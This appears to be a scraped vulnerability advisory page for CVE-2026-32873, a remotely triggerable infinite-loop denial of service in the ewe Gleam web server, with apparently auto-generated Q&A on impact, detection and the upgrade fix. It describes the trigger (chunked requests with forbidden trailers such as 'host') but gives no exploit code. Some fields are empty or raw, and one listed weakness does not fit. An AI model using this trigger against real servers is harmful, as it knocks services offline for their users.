CVE-2026-32873
Infinite Loop Vulnerability in ewe Web Server Causes CPU Hang
Publication date: 2026-03-20
Last updated on: 2026-04-16
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| vshakitskiy | ewe | From 0.8.0 (inc) to 3.0.5 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-835 | The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop. |
| CWE-825 | The product dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-32873 is a vulnerability in the Gleam web server called ewe, affecting versions 0.8.0 through 3.0.4. The issue lies in the handle_trailers function, which processes HTTP trailer headers in chunked requests. When the function encounters trailer headers that are forbidden or undeclared, it incorrectly recurses with the original unparsed buffer instead of advancing past the rejected header. This causes the same header to be re-parsed repeatedly, resulting in an infinite loop.
This infinite loop causes the BEAM process to wedge at 100% CPU usage with no timeout or escape, effectively causing a denial of service. The vulnerability is exploitable remotely by any unauthenticated client sending specially crafted chunked HTTP requests with forbidden trailers, and no application-level workaround exists because the issue occurs before control returns to application code.
How can this vulnerability impact me? :
This vulnerability can cause a denial of service (DoS) condition by making the server process enter an infinite loop at 100% CPU usage. This effectively wedges the process, making it unresponsive and exhausting server resources.
Since the vulnerability is exploitable remotely by unauthenticated attackers, it can be triggered by sending specially crafted chunked HTTP requests with forbidden trailer headers. This can lead to service outages or degraded performance, impacting availability.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability causes the affected ewe server process to enter an infinite loop when processing chunked HTTP requests with forbidden or undeclared trailer headers, resulting in 100% CPU usage and the server process hanging indefinitely.'}, {'type': 'paragraph', 'content': 'Detection can be performed by monitoring server processes for unusually high CPU usage, especially when handling chunked HTTP requests.'}, {'type': 'paragraph', 'content': "Additionally, sending crafted chunked HTTP requests containing forbidden trailer headers (such as 'host') can be used as a proof of concept to detect the vulnerability by observing if the server process hangs or consumes excessive CPU."}, {'type': 'paragraph', 'content': 'Example command to test the vulnerability (using curl with chunked transfer encoding and forbidden trailer headers) could be constructed, but specific commands are not provided in the available resources.'}] [3]
What immediate steps should I take to mitigate this vulnerability?
The vulnerability is fixed in ewe version 3.0.5. The immediate and recommended mitigation is to upgrade the ewe web server to version 3.0.5 or later.
No application-level workaround exists because the infinite loop occurs inside the read_body function before control returns to application code.
Until the upgrade is applied, monitoring and limiting incoming chunked HTTP requests with trailer headers from untrusted sources may help reduce exposure.